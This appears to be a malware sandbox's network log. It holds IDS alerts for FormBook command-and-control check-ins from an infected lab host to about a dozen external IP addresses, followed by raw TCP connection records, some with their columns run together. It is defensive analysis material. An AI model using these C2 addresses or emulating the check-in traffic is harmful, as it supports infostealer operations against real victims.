2024-12-14T13:50:23.906363+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49859 | 13.228.81.39 | 80 | TCP
2024-12-14T13:50:26.635454+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49865 | 13.228.81.39 | 80 | TCP
2024-12-14T13:50:26.635454+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49865 | 13.228.81.39 | 80 | TCP
2024-12-14T13:50:33.366325+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49882 | 172.67.129.38 | 80 | TCP
2024-12-14T13:50:36.030415+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49888 | 172.67.129.38 | 80 | TCP
2024-12-14T13:50:38.712022+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49895 | 172.67.129.38 | 80 | TCP
2024-12-14T13:50:41.363963+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49901 | 172.67.129.38 | 80 | TCP
2024-12-14T13:50:41.363963+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49901 | 172.67.129.38 | 80 | TCP
2024-12-14T13:50:48.616036+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49917 | 185.42.14.166 | 80 | TCP
2024-12-14T13:50:51.276243+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49929 | 185.42.14.166 | 80 | TCP
2024-12-14T13:50:53.959214+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49935 | 185.42.14.166 | 80 | TCP
2024-12-14T13:50:56.996275+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49942 | 185.42.14.166 | 80 | TCP
2024-12-14T13:50:56.996275+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49942 | 185.42.14.166 | 80 | TCP
2024-12-14T13:51:04.317728+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49959 | 209.74.77.107 | 80 | TCP
2024-12-14T13:51:07.404255+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49965 | 209.74.77.107 | 80 | TCP
2024-12-14T13:51:10.137287+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49974 | 209.74.77.107 | 80 | TCP
2024-12-14T13:51:12.742743+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49981 | 209.74.77.107 | 80 | TCP
2024-12-14T13:51:12.742743+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49981 | 209.74.77.107 | 80 | TCP
2024-12-14T13:51:19.636546+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49998 | 84.32.84.32 | 80 | TCP
2024-12-14T13:51:22.304891+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50004 | 84.32.84.32 | 80 | TCP
2024-12-14T13:51:24.980711+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50012 | 84.32.84.32 | 80 | TCP
2024-12-14T13:51:27.644739+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50020 | 84.32.84.32 | 80 | TCP
2024-12-14T13:51:27.644739+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50020 | 84.32.84.32 | 80 | TCP
2024-12-14T13:51:35.606703+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50028 | 154.208.202.225 | 80 | TCP
2024-12-14T13:51:38.352647+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50029 | 154.208.202.225 | 80 | TCP
2024-12-14T13:51:41.083079+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50030 | 154.208.202.225 | 80 | TCP
2024-12-14T13:51:44.674370+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50031 | 154.208.202.225 | 80 | TCP
2024-12-14T13:51:44.674370+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50031 | 154.208.202.225 | 80 | TCP
2024-12-14T13:51:51.687251+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50032 | 77.68.64.45 | 80 | TCP
2024-12-14T13:51:54.365294+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50033 | 77.68.64.45 | 80 | TCP
2024-12-14T13:51:57.217666+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50034 | 77.68.64.45 | 80 | TCP
2024-12-14T13:51:59.883911+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50035 | 77.68.64.45 | 80 | TCP
2024-12-14T13:51:59.883911+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50035 | 77.68.64.45 | 80 | TCP
2024-12-14T13:52:07.434173+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50038 | 208.91.197.27 | 80 | TCP
2024-12-14T13:52:10.170829+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50039 | 208.91.197.27 | 80 | TCP
2024-12-14T13:52:12.932527+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50040 | 208.91.197.27 | 80 | TCP
2024-12-14T13:52:15.991017+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50041 | 208.91.197.27 | 80 | TCP
2024-12-14T13:52:15.991017+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50041 | 208.91.197.27 | 80 | TCP
2024-12-14T13:52:22.793820+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50042 | 84.32.84.32 | 80 | TCP
2024-12-14T13:52:25.457591+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50043 | 84.32.84.32 | 80 | TCP
2024-12-14T13:52:28.132803+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50044 | 84.32.84.32 | 80 | TCP
2024-12-14T13:52:30.801841+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50045 | 84.32.84.32 | 80 | TCP
2024-12-14T13:52:30.801841+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50045 | 84.32.84.32 | 80 | TCP
2024-12-14T13:52:37.562250+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50046 | 104.21.77.71 | 80 | TCP
2024-12-14T13:52:40.212187+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50047 | 104.21.77.71 | 80 | TCP
2024-12-14T13:52:42.888647+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50048 | 104.21.77.71 | 80 | TCP
2024-12-14T13:52:45.557053+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50049 | 104.21.77.71 | 80 | TCP
2024-12-14T13:52:45.557053+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50049 | 104.21.77.71 | 80 | TCP
2024-12-14T13:52:52.336545+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50050 | 172.67.220.36 | 80 | TCP
2024-12-14T13:52:55.020976+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50051 | 172.67.220.36 | 80 | TCP
2024-12-14T13:52:57.703236+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50052 | 172.67.220.36 | 80 | TCP
2024-12-14T13:53:00.357479+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50053 | 172.67.220.36 | 80 | TCP
2024-12-14T13:53:00.357479+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50053 | 172.67.220.36 | 80 | TCP
2024-12-14T13:53:07.609519+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50054 | 162.0.217.35 | 80 | TCP
2024-12-14T13:53:10.281537+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50057 | 162.0.217.35 | 80 | TCP
2024-12-14T13:53:12.937669+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50058 | 162.0.217.35 | 80 | TCP
2024-12-14T13:53:15.421804+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50059 | 162.0.217.35 | 80 | TCP
2024-12-14T13:53:15.421804+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50059 | 162.0.217.35 | 80 | TCP
2024-12-14T13:53:22.487121+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50060 | 81.2.196.19 | 80 | TCP
2024-12-14T13:53:25.152051+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50061 | 81.2.196.19 | 80 | TCP
2024-12-14T13:53:28.184283+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50062 | 81.2.196.19 | 80 | TCP
2024-12-14T13:53:30.855901+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50063 | 81.2.196.19 | 80 | TCP
2024-12-14T13:53:30.855901+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50063 | 81.2.196.19 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 14, 2024 13:49:59.202604055 CET | 49801 | 80 | 192.168.2.5 | 154.12.28.184
Dec 14, 2024 13:49:59.322382927 CET | 80 | 49801 | 154.12.28.184 | 192.168.2.5
Dec 14, 2024 13:49:59.322552919 CET | 49801 | 80 | 192.168.2.5 | 154.12.28.184
Dec 14, 2024 13:49:59.332856894 CET | 49801 | 80 | 192.168.2.5 | 154.12.28.184
Dec 14, 2024 13:49:59.452615023 CET | 80 | 49801 | 154.12.28.184 | 192.168.2.5
Dec 14, 2024 13:50:00.870424986 CET | 80 | 49801 | 154.12.28.184 | 192.168.2.5
Dec 14, 2024 13:50:00.870496988 CET | 80 | 49801 | 154.12.28.184 | 192.168.2.5
Dec 14, 2024 13:50:00.870709896 CET | 49801 | 80 | 192.168.2.5 | 154.12.28.184
Dec 14, 2024 13:50:00.874100924 CET | 49801 | 80 | 192.168.2.5 | 154.12.28.184
Dec 14, 2024 13:50:00.993895054 CET | 80 | 49801 | 154.12.28.184 | 192.168.2.5
Dec 14, 2024 13:50:16.923512936 CET | 49843 | 80 | 192.168.2.5 | 13.228.81.39
Dec 14, 2024 13:50:17.043487072 CET | 80 | 49843 | 13.228.81.39 | 192.168.2.5
Dec 14, 2024 13:50:17.043605089 CET | 49843 | 80 | 192.168.2.5 | 13.228.81.39
Dec 14, 2024 13:50:17.064775944 CET | 49843 | 80 | 192.168.2.5 | 13.228.81.39
Dec 14, 2024 13:50:17.184695005 CET | 80 | 49843 | 13.228.81.39 | 192.168.2.5
Dec 14, 2024 13:50:18.578499079 CET | 49843 | 80 | 192.168.2.5 | 13.228.81.39
Dec 14, 2024 13:50:18.630604982 CET | 80 | 49843 | 13.228.81.39 | 192.168.2.5
Dec 14, 2024 13:50:18.630647898 CET | 80 | 49843 | 13.228.81.39 | 192.168.2.5
Dec 14, 2024 13:50:18.630799055 CET | 49843 | 80 | 192.168.2.5 | 13.228.81.39
Dec 14, 2024 13:50:18.630799055 CET | 49843 | 80 | 192.168.2.5 | 13.228.81.39
Dec 14, 2024 13:50:18.698548079 CET | 80 | 49843 | 13.228.81.39 | 192.168.2.5
Dec 14, 2024 13:50:18.698699951 CET | 49843 | 80 | 192.168.2.5 | 13.228.81.39
Dec 14, 2024 13:50:19.598078012 CET | 49849 | 80 | 192.168.2.5 | 13.228.81.39
                                                                                Dec 14, 2024 13:50:19.718147039 CET804984913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:19.718460083 CET4984980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:19.732862949 CET4984980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:19.853974104 CET804984913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:21.234518051 CET4984980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:21.308003902 CET804984913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:21.308087111 CET4984980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:21.308115959 CET804984913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:21.308163881 CET4984980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:21.354676962 CET804984913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:21.354748011 CET4984980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:22.253864050 CET4985980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:22.373676062 CET804985913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:22.377718925 CET4985980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:22.392061949 CET4985980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:22.511764050 CET804985913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:22.511874914 CET804985913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:23.906363010 CET4985980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:24.187650919 CET804985913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:24.187675953 CET804985913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:24.187840939 CET4985980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:24.187875986 CET4985980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:24.188128948 CET804985913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:24.188177109 CET4985980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:24.234249115 CET804985913.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:24.234440088 CET4985980192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:24.926492929 CET4986580192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:25.046547890 CET804986513.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:25.046947956 CET4986580192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:25.056581974 CET4986580192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:25.176795959 CET804986513.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:26.635133982 CET804986513.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:26.635174036 CET804986513.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:26.635453939 CET4986580192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:26.638294935 CET4986580192.168.2.513.228.81.39
                                                                                Dec 14, 2024 13:50:26.758090973 CET804986513.228.81.39192.168.2.5
                                                                                Dec 14, 2024 13:50:31.971522093 CET4988280192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:32.091306925 CET8049882172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:32.091428041 CET4988280192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:32.105751991 CET4988280192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:32.225502014 CET8049882172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:33.366174936 CET8049882172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:33.366254091 CET8049882172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:33.366324902 CET4988280192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:33.366661072 CET8049882172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:33.366758108 CET4988280192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:33.620709896 CET4988280192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:34.628750086 CET4988880192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:34.748564959 CET8049888172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:34.749809980 CET4988880192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:34.765428066 CET4988880192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:34.894709110 CET8049888172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:36.030252934 CET8049888172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:36.030323029 CET8049888172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:36.030415058 CET4988880192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:36.030797958 CET8049888172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:36.030869007 CET4988880192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:36.281687975 CET4988880192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:37.301409006 CET4989580192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:37.421102047 CET8049895172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:37.421221972 CET4989580192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:37.439019918 CET4989580192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:37.558792114 CET8049895172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:37.558873892 CET8049895172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:38.711863041 CET8049895172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:38.711951971 CET8049895172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:38.712022066 CET4989580192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:38.712776899 CET8049895172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:38.712832928 CET4989580192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:38.953293085 CET4989580192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:39.971941948 CET4990180192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:40.091918945 CET8049901172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:40.092118025 CET4990180192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:40.101349115 CET4990180192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:40.221303940 CET8049901172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:41.363744020 CET8049901172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:41.363765001 CET8049901172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:41.363814116 CET8049901172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:41.363827944 CET8049901172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:41.363913059 CET8049901172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:41.363962889 CET4990180192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:41.364037991 CET4990180192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:41.368695021 CET4990180192.168.2.5172.67.129.38
                                                                                Dec 14, 2024 13:50:41.489089012 CET8049901172.67.129.38192.168.2.5
                                                                                Dec 14, 2024 13:50:47.176435947 CET4991780192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:47.296166897 CET8049917185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:47.296343088 CET4991780192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:47.310389996 CET4991780192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:47.430885077 CET8049917185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:48.615886927 CET8049917185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:48.615922928 CET8049917185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:48.616035938 CET4991780192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:48.812674999 CET4991780192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:49.831612110 CET4992980192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:49.951533079 CET8049929185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:49.951733112 CET4992980192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:49.967820883 CET4992980192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:50.087538004 CET8049929185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:51.276110888 CET8049929185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:51.276192904 CET8049929185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:51.276242971 CET4992980192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:51.485521078 CET4992980192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:52.507469893 CET4993580192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:52.627654076 CET8049935185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:52.627887011 CET4993580192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:52.644552946 CET4993580192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:52.764678001 CET8049935185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:52.764803886 CET8049935185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:53.957189083 CET8049935185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:53.959147930 CET8049935185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:53.959213972 CET4993580192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:54.156330109 CET4993580192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:55.175396919 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:55.295546055 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:55.295650959 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:55.304784060 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:55.424978018 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996095896 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996113062 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996274948 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:56.996841908 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996860981 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996872902 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996879101 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996890068 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996901989 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996920109 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:56.996958017 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:56.996958017 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.996972084 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:56.997020006 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:56.998611927 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.046879053 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.116619110 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.116637945 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.116822004 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.120877981 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.120891094 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.120995998 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.129198074 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.129344940 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.129443884 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.137830973 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.137861013 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.138006926 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.146434069 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.146482944 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.146606922 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.154515982 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.154619932 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.154695988 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.163094997 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.163150072 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.163427114 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.171379089 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.171546936 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:50:57.171937943 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.174818993 CET4994280192.168.2.5185.42.14.166
                                                                                Dec 14, 2024 13:50:57.294910908 CET8049942185.42.14.166192.168.2.5
                                                                                Dec 14, 2024 13:51:02.952601910 CET4995980192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:03.072348118 CET8049959209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:03.072490931 CET4995980192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:03.091006041 CET4995980192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:03.211296082 CET8049959209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:04.314090967 CET8049959209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:04.314171076 CET8049959209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:04.317728043 CET4995980192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:04.604697943 CET4995980192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:05.613009930 CET4996580192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:06.179442883 CET8049965209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:06.179744005 CET4996580192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:06.195230961 CET4996580192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:06.315254927 CET8049965209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:07.403924942 CET8049965209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:07.404073954 CET8049965209.74.77.107192.168.2.5
                                                                                Dec 14, 2024 13:51:07.404254913 CET4996580192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:07.703591108 CET4996580192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:08.723294020 CET4997480192.168.2.5209.74.77.107
                                                                                Dec 14, 2024 13:51:08.843277931 CET8049974209.74.77.107192.168.2.5
